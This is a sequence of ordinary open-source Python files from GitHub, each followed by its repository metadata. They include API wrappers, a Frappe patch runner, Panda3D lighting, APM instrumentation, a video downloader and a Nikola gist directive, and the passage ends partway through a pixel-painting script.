return GetListsByEntityChoreographyExecution(session, exec_id, path)
class GetListsByEntityInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetListsByEntity
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key obtained from LittleSis.org.)
"""
super(GetListsByEntityInputSet, self)._set_input('APIKey', value)
def set_EntityID(self, value):
"""
Set the value of the EntityID input for this Choreo. ((required, integer) The ID of the record to be returned.)
"""
super(GetListsByEntityInputSet, self)._set_input('EntityID', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) Format of the response returned by LittleSis.org. Acceptable inputs: xml or json. Defaults to xml)
"""
super(GetListsByEntityInputSet, self)._set_input('ResponseFormat', value)
class GetListsByEntityResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetListsByEntity Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from LittleSis.org.)
"""
return self._output.get('Response', None)
class GetListsByEntityChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetListsByEntityResultSet(response, path)
| {
"content_hash": "149be0c12e4483cd6f67de1a9ff52e8a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 185,
"avg_line_length": 40.57575757575758,
"alnum_prop": 0.7064973861090366,
"repo_name": "jordanemedlock/psychtruths",
"id": "a8066ea73741784c3528331d87c1c0f8be9f919a",
"size": "3592",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/core/Library/LittleSis/Entity/GetListsByEntity.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals, print_function
"""
Execute Patch Files
To run directly
python lib/wnf.py patch patch1, patch2 etc
python lib/wnf.py patch -f patch1, patch2 etc
where patch1, patch2 is module name
"""
import frappe, frappe.permissions, time
# for patches
import os
class PatchError(Exception): pass
def run_all(skip_failing=False):
"""run all pending patches"""
executed = [p[0] for p in frappe.db.sql("""select patch from `tabPatch Log`""")]
frappe.flags.final_patches = []
def run_patch(patch):
try:
if not run_single(patchmodule = patch):
log(patch + ': failed: STOPPED')
raise PatchError(patch)
except Exception:
if not skip_failing:
raise
else:
log('Failed to execute patch')
for patch in get_all_patches():
if patch and (patch not in executed):
run_patch(patch)
# patches to be run in the end
for patch in frappe.flags.final_patches:
patch = patch.replace('finally:', '')
run_patch(patch)
def get_all_patches():
patches = []
for app in frappe.get_installed_apps():
if app == "shopping_cart":
continue
# 3-to-4 fix
if app=="webnotes":
app="frappe"
patches.extend(frappe.get_file_items(frappe.get_pymodule_path(app, "patches.txt")))
return patches
def reload_doc(args):
import frappe.modules
run_single(method = frappe.modules.reload_doc, methodargs = args)
def run_single(patchmodule=None, method=None, methodargs=None, force=False):
from frappe import conf
# don't write txt files
conf.developer_mode = 0
if force or method or not executed(patchmodule):
return execute_patch(patchmodule, method, methodargs)
else:
return True
def execute_patch(patchmodule, method=None, methodargs=None):
"""execute the patch"""
block_user(True)
frappe.db.begin()
start_time = time.time()
try:
log('Executing {patch} in {site} ({db})'.format(patch=patchmodule or str(methodargs),
site=frappe.local.site, db=frappe.db.cur_db_name))
if patchmodule:
if patchmodule.startswith("finally:"):
# run run patch at the end
frappe.flags.final_patches.append(patchmodule)
else:
if patchmodule.startswith("execute:"):
exec(patchmodule.split("execute:")[1],globals())
else:
frappe.get_attr(patchmodule.split()[0] + ".execute")()
update_patch_log(patchmodule)
elif method:
method(**methodargs)
except Exception:
frappe.db.rollback()
raise
else:
frappe.db.commit()
end_time = time.time()
block_user(False)
log('Success: Done in {time}s'.format(time = round(end_time - start_time, 3)))
return True
def update_patch_log(patchmodule):
"""update patch_file in patch log"""
frappe.get_doc({"doctype": "Patch Log", "patch": patchmodule}).insert(ignore_permissions=True)
def executed(patchmodule):
"""return True if is executed"""
if patchmodule.startswith('finally:'):
# patches are saved without the finally: tag
patchmodule = patchmodule.replace('finally:', '')
done = frappe.db.get_value("Patch Log", {"patch": patchmodule})
# if done:
# print "Patch %s already executed in %s" % (patchmodule, frappe.db.cur_db_name)
return done
def block_user(block):
"""stop/start execution till patch is run"""
frappe.local.flags.in_patch = block
frappe.db.begin()
msg = "Patches are being executed in the system. Please try again in a few moments."
frappe.db.set_global('__session_status', block and 'stop' or None)
frappe.db.set_global('__session_status_message', block and msg or None)
frappe.db.commit()
def check_session_stopped():
if frappe.db.get_global("__session_status")=='stop':
frappe.msgprint(frappe.db.get_global("__session_status_message"))
raise frappe.SessionStopped('Session Stopped')
def log(msg):
print (msg)
| {
"content_hash": "f3ebdd08704e5414aa74df92619112f1",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 95,
"avg_line_length": 27.65671641791045,
"alnum_prop": 0.7031840259039396,
"repo_name": "vjFaLk/frappe",
"id": "b3237b8b76eae4634af959f2da411039828a1da5",
"size": "3807",
"binary": false,
"copies": "1",
"ref": "refs/heads/parsimony-production",
"path": "frappe/modules/patch_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "290337"
},
{
"name": "HTML",
"bytes": "179507"
},
{
"name": "JavaScript",
"bytes": "2179734"
},
{
"name": "Less",
"bytes": "146135"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "2774237"
},
{
"name": "SCSS",
"bytes": "15721"
},
{
"name": "Shell",
"bytes": "3875"
},
{
"name": "Vue",
"bytes": "95109"
}
],
"symlink_target": ""
} |
from pandac.PandaModules import NodePath
from pandac.PandaModules import VBase4
from pandac.PandaModules import BitMask32
from pandac.PandaModules import DirectionalLight as PDirectionalLight
class DirLight:
"""Creates a simple directional light"""
def __init__(self,manager,xml):
self.light = PDirectionalLight('dlight')
self.lightNode = NodePath(self.light)
self.lightNode.setCompass()
if hasattr(self.lightNode.node(), "setCameraMask"):
self.lightNode.node().setCameraMask(BitMask32.bit(3))
self.reload(manager,xml)
def reload(self,manager,xml):
color = xml.find('color')
if color!=None:
self.light.setColor(VBase4(float(color.get('r')),
float(color.get('g')),
float(color.get('b')), 1.0))
pos = xml.find('pos')
if pos!=None:
self.lightNode.setPos(float(pos.get('x')),
float(pos.get('y')),
float(pos.get('z')))
else:
self.lightNode.setPos(0, 0, 0)
lookAt = xml.find('lookAt')
if lookAt!=None:
self.lightNode.lookAt(float(lookAt.get('x')),
float(lookAt.get('y')),
float(lookAt.get('z')))
lens = xml.find('lens')
if lens!=None and hasattr(self.lightNode.node(), 'getLens'):
if bool(int(lens.get('auto'))):
self.lightNode.reparentTo(base.camera)
else:
self.lightNode.reparentTo(render)
lobj = self.lightNode.node().getLens()
lobj.setNearFar(float(lens.get('near', 1.0)),
float(lens.get('far', 100000.0)))
lobj.setFilmSize(float(lens.get('width', 1.0)),
float(lens.get('height', 1.0)))
lobj.setFilmOffset(float(lens.get('x', 0.0)),
float(lens.get('y', 0.0)))
if hasattr(self.lightNode.node(), 'setShadowCaster'):
shadows = xml.find('shadows')
if shadows!=None:
self.lightNode.node().setShadowCaster(True, int(shadows.get('width', 512)),
int(shadows.get('height', 512)),
int(shadows.get('sort', -10)))
#self.lightNode.node().setPushBias(float(shadows.get('bias', 0.5)))
else:
self.lightNode.node().setShadowCaster(False)
def start(self):
render.setLight(self.lightNode)
def stop(self):
render.clearLight(self.lightNode)
| {
"content_hash": "9632483af513ff9955e29b71504c39ea",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 84,
"avg_line_length": 35.5,
"alnum_prop": 0.5661971830985916,
"repo_name": "frainfreeze/FPS-kit",
"id": "d427c817ba807b2dce63d67f9c3e85e7d0e83d7c",
"size": "3098",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/dirlight/dirlight.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "148345"
},
{
"name": "Shell",
"bytes": "75"
}
],
"symlink_target": ""
} |
from elasticapm.instrumentation.packages.dbapi2 import (
ConnectionProxy,
CursorProxy,
DbApi2Instrumentation,
extract_signature,
)
class PyMySQLCursorProxy(CursorProxy):
provider_name = "mysql"
def extract_signature(self, sql):
return extract_signature(sql)
class PyMySQLConnectionProxy(ConnectionProxy):
cursor_proxy = PyMySQLCursorProxy
class PyMySQLConnectorInstrumentation(DbApi2Instrumentation):
name = "pymysql"
instrument_list = [("pymysql", "connect")]
def call(self, module, method, wrapped, instance, args, kwargs):
return PyMySQLConnectionProxy(wrapped(*args, **kwargs))
| {
"content_hash": "6c39de00bddc294b59d2b0c100b1ac08",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 68,
"avg_line_length": 24.884615384615383,
"alnum_prop": 0.732612055641422,
"repo_name": "beniwohli/apm-agent-python",
"id": "69b5e91b700133efe3eabe4b41b406d03cd6af7e",
"size": "2239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "elasticapm/instrumentation/packages/pymysql.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1685"
},
{
"name": "C",
"bytes": "81870"
},
{
"name": "Dockerfile",
"bytes": "1730"
},
{
"name": "Gherkin",
"bytes": "10997"
},
{
"name": "Groovy",
"bytes": "5676"
},
{
"name": "HTML",
"bytes": "560"
},
{
"name": "Makefile",
"bytes": "885"
},
{
"name": "Python",
"bytes": "1660078"
},
{
"name": "Shell",
"bytes": "12434"
}
],
"symlink_target": ""
} |
import json
import sys
import moviepy.editor as mpy
from numpy import cumsum
from replayenhancer.RaceData import RaceData
config = json.load(open(sys.argv[1]))
data = RaceData(config['source_telemetry'])
clip = mpy.VideoFileClip(config['source_video']).subclip(
config['video_skipstart'], config['video_skipend'])
try:
while True:
data.get_data()
except StopIteration:
pass
times = [time + config['sync_racestart'] for time in list(cumsum(data.drivers['Kobernulf Monnur'].lap_times))]
for lap, time in enumerate(times, 1):
clip.save_frame("outputs/lap{}.jpg".format(lap), time)
for ix in range(10, -11, -1):
offset = config['sync_racestart'] + ix / 100
times = [time + offset for time in list(cumsum(data.drivers['Kobernulf Monnur'].lap_times))]
clip.save_frame("outputs/sync{}.jpg".format(int(offset * 100)), times[0])
| {
"content_hash": "17dae5fdd4a723b6ddc27b87e990108b",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 110,
"avg_line_length": 30.821428571428573,
"alnum_prop": 0.6998841251448435,
"repo_name": "SenorPez/project-cars-replay-enhancer",
"id": "8383e2ddcf18fd2b75fa6ac1ca89fce2c2bdbbbd",
"size": "863",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/lappics.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "434767"
},
{
"name": "Shell",
"bytes": "318"
}
],
"symlink_target": ""
} |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/protobuf/debug.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n$tensorflow/core/protobuf/debug.proto\x12\ntensorflow\"\x8e\x01\n\x10\x44\x65\x62ugTensorWatch\x12\x11\n\tnode_name\x18\x01 \x01(\t\x12\x13\n\x0boutput_slot\x18\x02 \x01(\x05\x12\x11\n\tdebug_ops\x18\x03 \x03(\t\x12\x12\n\ndebug_urls\x18\x04 \x03(\t\x12+\n#tolerate_debug_op_creation_failures\x18\x05 \x01(\x08\"b\n\x0c\x44\x65\x62ugOptions\x12=\n\x17\x64\x65\x62ug_tensor_watch_opts\x18\x04 \x03(\x0b\x32\x1c.tensorflow.DebugTensorWatch\x12\x13\n\x0bglobal_step\x18\n \x01(\x03\x42,\n\x18org.tensorflow.frameworkB\x0b\x44\x65\x62ugProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
_DEBUGTENSORWATCH = _descriptor.Descriptor(
name='DebugTensorWatch',
full_name='tensorflow.DebugTensorWatch',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='node_name', full_name='tensorflow.DebugTensorWatch.node_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='output_slot', full_name='tensorflow.DebugTensorWatch.output_slot', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug_ops', full_name='tensorflow.DebugTensorWatch.debug_ops', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug_urls', full_name='tensorflow.DebugTensorWatch.debug_urls', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tolerate_debug_op_creation_failures', full_name='tensorflow.DebugTensorWatch.tolerate_debug_op_creation_failures', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=53,
serialized_end=195,
)
_DEBUGOPTIONS = _descriptor.Descriptor(
name='DebugOptions',
full_name='tensorflow.DebugOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='debug_tensor_watch_opts', full_name='tensorflow.DebugOptions.debug_tensor_watch_opts', index=0,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='global_step', full_name='tensorflow.DebugOptions.global_step', index=1,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=197,
serialized_end=295,
)
_DEBUGOPTIONS.fields_by_name['debug_tensor_watch_opts'].message_type = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugTensorWatch'] = _DEBUGTENSORWATCH
DESCRIPTOR.message_types_by_name['DebugOptions'] = _DEBUGOPTIONS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DebugTensorWatch = _reflection.GeneratedProtocolMessageType('DebugTensorWatch', (_message.Message,), dict(
DESCRIPTOR = _DEBUGTENSORWATCH,
__module__ = 'tensorflow.core.protobuf.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugTensorWatch)
))
_sym_db.RegisterMessage(DebugTensorWatch)
DebugOptions = _reflection.GeneratedProtocolMessageType('DebugOptions', (_message.Message,), dict(
DESCRIPTOR = _DEBUGOPTIONS,
__module__ = 'tensorflow.core.protobuf.debug_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.DebugOptions)
))
_sym_db.RegisterMessage(DebugOptions)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\013DebugProtosP\001\370\001\001'))
# @@protoc_insertion_point(module_scope)
| {
"content_hash": "1f58100ee97ce799177b5ee36ca1b72f",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 593,
"avg_line_length": 38.72027972027972,
"alnum_prop": 0.7200650171573054,
"repo_name": "ryfeus/lambda-packs",
"id": "58cec56bbb21450255b6aaae283df7e05eaeec9d",
"size": "5644",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tensorflow/source/tensorflow/core/protobuf/debug_pb2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9768343"
},
{
"name": "C++",
"bytes": "76566960"
},
{
"name": "CMake",
"bytes": "191097"
},
{
"name": "CSS",
"bytes": "153538"
},
{
"name": "Cuda",
"bytes": "61768"
},
{
"name": "Cython",
"bytes": "3110222"
},
{
"name": "Fortran",
"bytes": "110284"
},
{
"name": "HTML",
"bytes": "248658"
},
{
"name": "JavaScript",
"bytes": "62920"
},
{
"name": "MATLAB",
"bytes": "17384"
},
{
"name": "Makefile",
"bytes": "152150"
},
{
"name": "Python",
"bytes": "549307737"
},
{
"name": "Roff",
"bytes": "26398"
},
{
"name": "SWIG",
"bytes": "142"
},
{
"name": "Shell",
"bytes": "7790"
},
{
"name": "Smarty",
"bytes": "4090"
},
{
"name": "TeX",
"bytes": "152062"
},
{
"name": "XSLT",
"bytes": "305540"
}
],
"symlink_target": ""
} |
__all__ = ['ckplayer_download']
from xml.etree import cElementTree as ET
from copy import copy
from ..common import *
#----------------------------------------------------------------------
def ckplayer_get_info_by_xml(ckinfo):
"""str->dict
Information for CKPlayer API content."""
e = ET.XML(ckinfo)
video_dict = {'title': '',
#'duration': 0,
'links': [],
'size': 0,
'flashvars': '',}
dictified = dictify(e)['ckplayer']
if 'info' in dictified:
if '_text' in dictified['info'][0]['title'][0]: #title
video_dict['title'] = dictified['info'][0]['title'][0]['_text'].strip()
#if dictify(e)['ckplayer']['info'][0]['title'][0]['_text'].strip(): #duration
#video_dict['title'] = dictify(e)['ckplayer']['info'][0]['title'][0]['_text'].strip()
if '_text' in dictified['video'][0]['size'][0]: #size exists for 1 piece
video_dict['size'] = sum([int(i['size'][0]['_text']) for i in dictified['video']])
if '_text' in dictified['video'][0]['file'][0]: #link exist
video_dict['links'] = [i['file'][0]['_text'].strip() for i in dictified['video']]
if '_text' in dictified['flashvars'][0]:
video_dict['flashvars'] = dictified['flashvars'][0]['_text'].strip()
return video_dict
#----------------------------------------------------------------------
#helper
#https://stackoverflow.com/questions/2148119/how-to-convert-an-xml-string-to-a-dictionary-in-python
def dictify(r,root=True):
if root:
return {r.tag : dictify(r, False)}
d=copy(r.attrib)
if r.text:
d["_text"]=r.text
for x in r.findall("./*"):
if x.tag not in d:
d[x.tag]=[]
d[x.tag].append(dictify(x,False))
return d
#----------------------------------------------------------------------
def ckplayer_download_by_xml(ckinfo, output_dir = '.', merge = False, info_only = False, **kwargs):
#Info XML
video_info = ckplayer_get_info_by_xml(ckinfo)
try:
title = kwargs['title']
except:
title = ''
type_ = ''
size = 0
if len(video_info['links']) > 0: #has link
type_, _ext, size = url_info(video_info['links'][0]) #use 1st to determine type, ext
if 'size' in video_info:
size = int(video_info['size'])
else:
for i in video_info['links'][1:]: #save 1st one
size += url_info(i)[2]
print_info(site_info, title, type_, size)
if not info_only:
download_urls(video_info['links'], title, _ext, size, output_dir=output_dir, merge=merge)
#----------------------------------------------------------------------
def ckplayer_download(url, output_dir = '.', merge = False, info_only = False, is_xml = True, **kwargs):
if is_xml: #URL is XML URL
try:
title = kwargs['title']
except:
title = ''
try:
headers = kwargs['headers'] #headers provided
ckinfo = get_content(url, headers = headers)
except NameError:
ckinfo = get_content(url)
ckplayer_download_by_xml(ckinfo, output_dir, merge,
info_only, title = title)
site_info = "CKPlayer General"
download = ckplayer_download
download_playlist = playlist_not_supported('ckplayer')
| {
"content_hash": "1d5b1c94f567e75b21905391bd53d5ae",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 104,
"avg_line_length": 36.25806451612903,
"alnum_prop": 0.5094899169632265,
"repo_name": "qzane/you-get",
"id": "9115989796b76e11990e4b3e2e94329bae854b43",
"size": "3514",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "src/you_get/extractors/ckplayer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "805"
},
{
"name": "Python",
"bytes": "408097"
},
{
"name": "Shell",
"bytes": "2649"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'neurovault.settings')
nvcelery = Celery('neurovault')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
nvcelery.config_from_object('django.conf:settings')
nvcelery.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
from raven.contrib.django.raven_compat.models import client
from raven.contrib.celery import register_signal, register_logger_signal
# register a custom filter to filter out duplicate logs
register_logger_signal(client)
# hook into the Celery error handler
register_signal(client)
| {
"content_hash": "4220ed844fdd0dcb7b531fb8d76a3f33",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 72,
"avg_line_length": 29.541666666666668,
"alnum_prop": 0.8039492242595204,
"repo_name": "NeuroVault/NeuroVault",
"id": "79431ee5f1fdbab271353d8c0f851f6f12d1f0d0",
"size": "709",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neurovault/celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "5862"
},
{
"name": "HTML",
"bytes": "191016"
},
{
"name": "JavaScript",
"bytes": "26595"
},
{
"name": "Perl",
"bytes": "1374"
},
{
"name": "Python",
"bytes": "598856"
},
{
"name": "Shell",
"bytes": "4437"
}
],
"symlink_target": ""
} |
import octo
def do_client(taskfile, type=type, **options):
octo.do_client(taskfile=taskfile, type=type, **options) | {
"content_hash": "3ee9614602b5b2255426ccb87472357b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 60,
"avg_line_length": 24.2,
"alnum_prop": 0.71900826446281,
"repo_name": "zaqwes8811/micro-apps",
"id": "355af8fae9d18be91f9e670b7429b6b19811846b",
"size": "138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buffer/shard-cpp-test/shard-node/_code/octo_client_adapter.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "309556"
},
{
"name": "Assembly",
"bytes": "570069"
},
{
"name": "Batchfile",
"bytes": "56007"
},
{
"name": "C",
"bytes": "53062"
},
{
"name": "C#",
"bytes": "32208"
},
{
"name": "C++",
"bytes": "1108629"
},
{
"name": "CMake",
"bytes": "23718"
},
{
"name": "CSS",
"bytes": "186903"
},
{
"name": "Cuda",
"bytes": "9680"
},
{
"name": "Dart",
"bytes": "1158"
},
{
"name": "Dockerfile",
"bytes": "20181"
},
{
"name": "Go",
"bytes": "6640"
},
{
"name": "HTML",
"bytes": "2215958"
},
{
"name": "Haskell",
"bytes": "383"
},
{
"name": "Java",
"bytes": "140401"
},
{
"name": "JavaScript",
"bytes": "714877"
},
{
"name": "Jupyter Notebook",
"bytes": "25399728"
},
{
"name": "Kotlin",
"bytes": "713"
},
{
"name": "Lua",
"bytes": "2253"
},
{
"name": "MATLAB",
"bytes": "103"
},
{
"name": "Makefile",
"bytes": "33566"
},
{
"name": "Mako",
"bytes": "824"
},
{
"name": "NSIS",
"bytes": "7481"
},
{
"name": "PHP",
"bytes": "59915"
},
{
"name": "Pascal",
"bytes": "2492"
},
{
"name": "Pawn",
"bytes": "3337"
},
{
"name": "Python",
"bytes": "1836093"
},
{
"name": "QML",
"bytes": "58517"
},
{
"name": "QMake",
"bytes": "4042"
},
{
"name": "R",
"bytes": "13753"
},
{
"name": "Ruby",
"bytes": "522"
},
{
"name": "Rust",
"bytes": "210"
},
{
"name": "Scheme",
"bytes": "113588"
},
{
"name": "Scilab",
"bytes": "1348"
},
{
"name": "Shell",
"bytes": "16112"
},
{
"name": "SourcePawn",
"bytes": "3316"
},
{
"name": "VBScript",
"bytes": "9376"
},
{
"name": "XSLT",
"bytes": "24926"
}
],
"symlink_target": ""
} |
import pika
import sys, getopt
def main(argv):
server = ''
queueName = ''
if len(sys.argv) != 5:
print 'log.py -s <server> -q <queue>'
sys.exit(2)
try:
opts, args = getopt.getopt(argv,"hs::q:",["server=","queue="])
except getopt.GetoptError:
print 'log.py -s <server> -q <queue>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'log.py -s <server> -q <queue>'
sys.exit()
elif opt in ("-s", "--server"):
server = arg
elif opt in ("-q", "--queue"):
queueName = arg
connection = pika.BlockingConnection(pika.ConnectionParameters(host=server))
channel = connection.channel()
channel.queue_declare(queue=queueName)
print ' Waiting for log messages. To exit press CTRL+C'
def callback(ch, method, properties, body):
print body
channel.basic_consume(callback, queue=queueName, no_ack=True)
channel.start_consuming()
if __name__ == "__main__":
main(sys.argv[1:])
| {
"content_hash": "3afdb20e99ca8ad16d93e0966e53d7eb",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 79,
"avg_line_length": 26.36842105263158,
"alnum_prop": 0.591816367265469,
"repo_name": "HowardLander/DataBridge",
"id": "8eeb358ec6d79b0d811f4fda463010d895f9ca69",
"size": "1024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/python/log.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2842"
},
{
"name": "HTML",
"bytes": "4259"
},
{
"name": "Java",
"bytes": "822249"
},
{
"name": "JavaScript",
"bytes": "31621"
},
{
"name": "Shell",
"bytes": "23977"
}
],
"symlink_target": ""
} |
from docutils.parsers.rst import Directive, directives
from docutils import nodes
try:
import requests
except ImportError:
requests = None # NOQA
from nikola.plugin_categories import RestExtension
from nikola import utils
class Plugin(RestExtension):
name = "rest_gist"
def set_site(self, site):
self.site = site
directives.register_directive('gist', GitHubGist)
return super(Plugin, self).set_site(site)
class GitHubGist(Directive):
""" Embed GitHub Gist.
Usage:
.. gist:: GIST_ID
"""
required_arguments = 1
optional_arguments = 1
option_spec = {'file': directives.unchanged}
final_argument_whitespace = True
has_content = False
def get_raw_gist_with_filename(self, gistID, filename):
url = '/'.join(("https://raw.github.com/gist", gistID, filename))
return requests.get(url).text
def get_raw_gist(self, gistID):
url = "https://raw.github.com/gist/{0}".format(gistID)
return requests.get(url).text
def run(self):
if requests is None:
msg = (
'ERROR:'
'To use the gist directive, you need to install the '
'"requests" package.\n'
)
utils.show_msg(msg)
return [nodes.raw('', '<div class="text-error">{0}</div>'.format(msg), format='html')]
gistID = self.arguments[0].strip()
embedHTML = ""
rawGist = ""
if 'file' in self.options:
filename = self.options['file']
rawGist = (self.get_raw_gist_with_filename(gistID, filename))
embedHTML = ('<script src="https://gist.github.com/{0}.js'
'?file={1}"></script>').format(gistID, filename)
else:
rawGist = (self.get_raw_gist(gistID))
embedHTML = ('<script src="https://gist.github.com/{0}.js">'
'</script>').format(gistID)
return [nodes.raw('', embedHTML, format='html'),
nodes.raw('', '<noscript>', format='html'),
nodes.literal_block('', rawGist),
nodes.raw('', '</noscript>', format='html')]
| {
"content_hash": "a3aa1c59ca42767861ea4a88d118abe8",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 98,
"avg_line_length": 30.887323943661972,
"alnum_prop": 0.5649794801641587,
"repo_name": "damianavila/nikola",
"id": "f47edad2b73c50cddcbd3465d0bdd8b65e359407",
"size": "2282",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nikola/plugins/compile/rest/gist.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "315959"
},
{
"name": "JavaScript",
"bytes": "147595"
},
{
"name": "Python",
"bytes": "505175"
},
{
"name": "Shell",
"bytes": "663"
}
],
"symlink_target": ""
} |
"""Error controller"""
from tg import request, expose
__all__ = ['ErrorController']
class ErrorController(object):
"""
Generates error documents as and when they are required.
The ErrorDocuments middleware forwards to ErrorController when error
related status codes are returned from the application.
This behaviour can be altered by changing the parameters to the
ErrorDocuments middleware in your config/middleware.py file.
"""
@expose('tg2app.templates.error')
def document(self, *args, **kwargs):
"""Render the error document"""
resp = request.environ.get('pylons.original_response')
default_message = ("<p>We're sorry but we weren't able to process "
" this request.</p>")
values = dict(prefix=request.environ.get('SCRIPT_NAME', ''),
code=request.params.get('code', resp.status_int),
message=request.params.get('message', default_message))
return values
| {
"content_hash": "34088d7603ad6cd8855434f60ddbf137",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 77,
"avg_line_length": 35.10344827586207,
"alnum_prop": 0.6444007858546169,
"repo_name": "ralphbean/moksha",
"id": "3b2c3589d3e9980b9d774c646102c20eaa0847ec",
"size": "1042",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "moksha/tests/quickstarts/tg2app/tg2app/controllers/error.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "1249457"
},
{
"name": "Python",
"bytes": "731300"
},
{
"name": "Shell",
"bytes": "1776"
}
],
"symlink_target": ""
} |
from __future__ import print_function, division
from string import Template
import argparse
import json
import math
import sys
import re
class Point:
"""Represents a pixel that will be painted."""
def __init__(self, x, y, color=4):
self.x = x
self.y = y
self.color = color
def __str__(self):
return '{{x:{x}, y:{y}, color:{color}}}'.format(**self.__dict__)
COLORS = [
(255, 255, 255),
(228, 228, 228),
(136, 136, 136),
